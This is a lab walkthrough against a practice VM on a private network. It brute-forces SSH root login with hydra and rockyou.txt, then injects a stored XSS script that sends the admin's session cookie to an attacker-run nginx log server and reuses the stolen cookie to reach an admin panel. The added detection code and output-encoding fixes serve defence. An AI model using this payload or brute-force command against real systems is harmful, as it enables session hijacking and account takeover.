10.2 : Web app exploitation - XSS (Part II)

Picking the lowest-hanging fruit to crack

So right now we have two attack vectors:

  • SSH
  • Web Service

Cracking ssh

For SSH, we can launch a brute-force attack with hydra and leave it running as a background job while we look at the web service.

root@kali:~# locate rockyou
/usr/share/hashcat/masks/rockyou-1-60.hcmask
/usr/share/hashcat/masks/rockyou-2-1800.hcmask
/usr/share/hashcat/masks/rockyou-3-3600.hcmask
/usr/share/hashcat/masks/rockyou-4-43200.hcmask
/usr/share/hashcat/masks/rockyou-5-86400.hcmask
/usr/share/hashcat/masks/rockyou-6-864000.hcmask
/usr/share/hashcat/masks/rockyou-7-2592000.hcmask
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/john/rules/rockyou-30000.rule
/usr/share/wordlists/rockyou.txt.gz
root@kali:~# cd /usr/share/wordlists/
root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
root@kali:/usr/share/wordlists# ls -la
total 136660
drwxr-xr-x   2 root root      4096 Nov  5 19:31 .
drwxr-xr-x 338 root root     12288 Oct 24 23:24 ..
lrwxrwxrwx   1 root root        25 Oct 24 23:14 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx   1 root root        30 Oct 24 23:14 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx   1 root root        41 Oct 24 23:14 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx   1 root root        45 Oct 24 23:14 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx   1 root root        46 Oct 24 23:14 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx   1 root root        41 Oct 24 23:14 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r--   1 root root 139921507 Jul 17 02:59 rockyou.txt
lrwxrwxrwx   1 root root        25 Oct 24 23:14 wfuzz -> /usr/share/wfuzz/wordlist
root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt

root@kali:/usr/share/wordlists# hydra -v -l root -P /usr/share/wordlists/rockyou.txt -t 3 192.168.56.104 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-05 19:33:07
[DATA] max 3 tasks per 1 server, overall 3 tasks, 14344399 login tries (l:1/p:14344399), ~4781467 tries per task
[DATA] attacking ssh://192.168.56.104:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.56.104:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.104:22

Cracking Web service - xss

Back to our browser, we saw this…

(screenshot: service recon)

In the comment section, there is an XSS vector.

Let's try <script>alert("xss");</script> as the payload.

Got it.

Cracking Web service - xss - stealing user credentials

We can get the credentials by stealing document.cookie: a stored XSS payload in the comment makes the victim's browser send its cookie to a web server we control, so first we need a server that logs incoming requests.

Add access_log /var/log/nginx.log; to the nginx config file, then start nginx:

service nginx start

Let's try our log server. A request for a path that does not exist gets the default nginx 404 page, and every request, including the test hit on /cred=a, shows up in the log:

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>

root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"

Success.

Let's inject this script into the comment field of our target:

```html
<script>
    var img = document.createElement("img");
    img.src = "http://192.168.56.101/?cred="+document.cookie;
    document.body.appendChild(img);
</script>
```

Wait a bit for the admin to take the bait...

root@kali:~# tail -f /var/log/nginx.log
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /robots.txt HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /icons/openlogo-75.png HTTP/1.1" 404 143 "http://192.168.56.101/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /favicon.ico HTTP/1.1" 404 143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.101 - - [05/Nov/2019:19:51:09 -0800] "GET /cred=cookie_here HTTP/1.1" 404 169 "-" "curl/7.65.3"
192.168.56.1 - - [05/Nov/2019:19:55:56 -0800] "GET /?cred=PHPSESSID=e3dk856nao88pv2fokmhkmm9b7 HTTP/1.1" 200 3437 "http://192.168.56.104/post.php?id=2" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:70.0) Gecko/20100101 Firefox/70.0"
192.168.56.104 - - [05/Nov/2019:19:56:05 -0800] "GET /?cred=PHPSESSID=nl65c43q2vfjd77ebebv2dgko1 HTTP/1.1" 200 3437 "http://127.0.0.1/post.php?id=2" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.1 Safari/534.34"

GOT IT.
PHPSESSID=nl65c43q2vfjd77ebebv2dgko1
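The same beacon is just as visible to whoever reviews the logs of a proxy or web server the request passes through: a session cookie name inside a query string is a strong exfiltration signal, and the Referer tells you which page carried the injection. The following is an added example, not part of the write-up: it parses nginx combined-format lines and flags requests whose query carries a session cookie. The sample log is constructed, modelled on the entries above with shortened user agents, plus two extra lines (a URL-encoded multi-cookie beacon and a benign search that merely mentions PHPSESSID) to show what is and is not flagged.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# nginx "combined" log format (the default, which the log server above writes).
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\d+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Cookie names that should never travel in a query string.
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "ASP.NET_SessionId",
                        "connect.sid", "session", "sessionid"}

# Constructed sample log: the write-up's hits with shortened user agents, plus a
# URL-encoded multi-cookie beacon and a benign search mentioning PHPSESSID.
SAMPLE_LOG = """\
192.168.56.1 - - [05/Nov/2019:19:47:29 -0800] "GET / HTTP/1.1" 200 3437 "-" "Mozilla/5.0"
192.168.56.1 - - [05/Nov/2019:19:47:39 -0800] "GET /cred=a HTTP/1.1" 404 143 "-" "Mozilla/5.0"
192.168.56.1 - - [05/Nov/2019:19:55:56 -0800] "GET /?cred=PHPSESSID=e3dk856nao88pv2fokmhkmm9b7 HTTP/1.1" 200 3437 "http://192.168.56.104/post.php?id=2" "Mozilla/5.0"
192.168.56.104 - - [05/Nov/2019:19:56:05 -0800] "GET /?cred=PHPSESSID=nl65c43q2vfjd77ebebv2dgko1 HTTP/1.1" 200 3437 "http://127.0.0.1/post.php?id=2" "PhantomJS/1.9.1"
10.0.0.7 - - [05/Nov/2019:20:01:00 -0800] "GET /?PHPSESSID=abc123%3B%20theme%3Ddark HTTP/1.1" 200 12 "-" "curl/7.65.3"
10.0.0.8 - - [05/Nov/2019:20:02:00 -0800] "GET /search?q=PHPSESSID+help HTTP/1.1" 200 12 "-" "curl/7.65.3"
"""

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def cookie_names_in(value):
    """Cookie names in a string shaped like document.cookie ('a=1; b=2')."""
    names = []
    for part in value.split(";"):
        name, sep, _ = part.strip().partition("=")
        if sep and name:
            names.append(name)
    return names

def exfil_reasons(entry):
    """Reasons this request looks like a cookie beacon; empty list if none."""
    reasons = []
    query = urlsplit(entry["target"]).query          # parse_qsl also URL-decodes
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in SESSION_COOKIE_NAMES:
            reasons.append(f"query key {key} is a session cookie name")
        leaked = [n for n in cookie_names_in(value) if n in SESSION_COOKIE_NAMES]
        if leaked:
            reasons.append(f"parameter {key} carries cookie(s) {', '.join(leaked)}")
    return reasons

def scan(log_text):
    """One record per suspicious request: who sent it, which site it came from, why."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = exfil_reasons(entry)
        if reasons:
            hits.append({"client": entry["client"],
                         "referer": urlsplit(entry["referer"]).netloc or "-",
                         "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run against the sample, the two PHPSESSID beacons and the encoded one are reported with their originating host (192.168.56.104 and 127.0.0.1, i.e. the vulnerable post.php page), while the `/cred=a` test and the search query are left alone. The same check works on a proxy or WAF log of the victim site, which is where a defender would actually deploy it.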

Swap in this cookie with Cookie Editor, and let's try to get into the admin panel.


Pwned.
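Two fixes close what this walkthrough exploits: output-encoding the comment for its HTML context stops the script from running at all, and the HttpOnly flag on PHPSESSID keeps document.cookie from exposing the session even if another injection slips through. The following is an added example and not the lab application's code: Python models of the vulnerable and the fixed renderer, with the write-up's own payload as input, plus a Set-Cookie builder. The wrapper markup and the session-id character check are assumptions.

```python
import html
import re

# The stored-XSS payload from the write-up, kept verbatim as test input.
STORED_PAYLOAD = (
    '<script>\n'
    '    var img = document.createElement("img");\n'
    '    img.src = "http://192.168.56.101/?cred="+document.cookie;\n'
    '    document.body.appendChild(img);\n'
    '</script>'
)

# Assumed page markup around a comment; the real application's markup is unknown.
WRAPPER_OPEN, WRAPPER_CLOSE = '<div class="comment">', '</div>'

def render_comment_vulnerable(comment):
    """The bug behind the walkthrough: untrusted text concatenated straight into HTML."""
    return WRAPPER_OPEN + comment + WRAPPER_CLOSE

def render_comment_safe(comment):
    """Output-encode for an HTML text context: < > & and quotes become entities, so
    the browser displays the payload instead of executing it
    (PHP equivalent: htmlspecialchars($comment, ENT_QUOTES, 'UTF-8'))."""
    return WRAPPER_OPEN + html.escape(comment, quote=True) + WRAPPER_CLOSE

TAG_RE = re.compile(r"</?[A-Za-z][^>]*>")

def comment_contains_markup(rendered):
    """True if any tag survives inside the wrapper, i.e. the comment can alter the DOM."""
    inner = rendered[len(WRAPPER_OPEN):len(rendered) - len(WRAPPER_CLOSE)]
    return TAG_RE.search(inner) is not None

def session_cookie_header(session_id, secure=True):
    """Set-Cookie line for PHPSESSID with the flags that keep document.cookie from
    exposing it (HttpOnly) and limit cross-site sending (SameSite, Secure).
    PHP sets the same flags via session.cookie_httponly, session.cookie_secure and
    session.cookie_samesite. The allowed-character check is an assumption about
    the id format, based on the alphanumeric ids seen in the log above."""
    if not re.fullmatch(r"[A-Za-z0-9,-]{22,128}", session_id):
        raise ValueError("unexpected characters in session id")
    attrs = ["Path=/", "HttpOnly", "SameSite=Lax"] + (["Secure"] if secure else [])
    return f"Set-Cookie: PHPSESSID={session_id}; " + "; ".join(attrs)

if __name__ == "__main__":
    print(render_comment_safe(STORED_PAYLOAD))
    print(session_cookie_header("nl65c43q2vfjd77ebebv2dgko1"))
```

Encoding is the primary fix, since it removes the injection; HttpOnly is defence in depth that turns a future XSS from session theft into something less, and SameSite=Lax additionally keeps the cookie off cross-site image and form requests. A Content-Security-Policy that disallows inline script would have blocked the payload as well, but it does not replace correct output encoding.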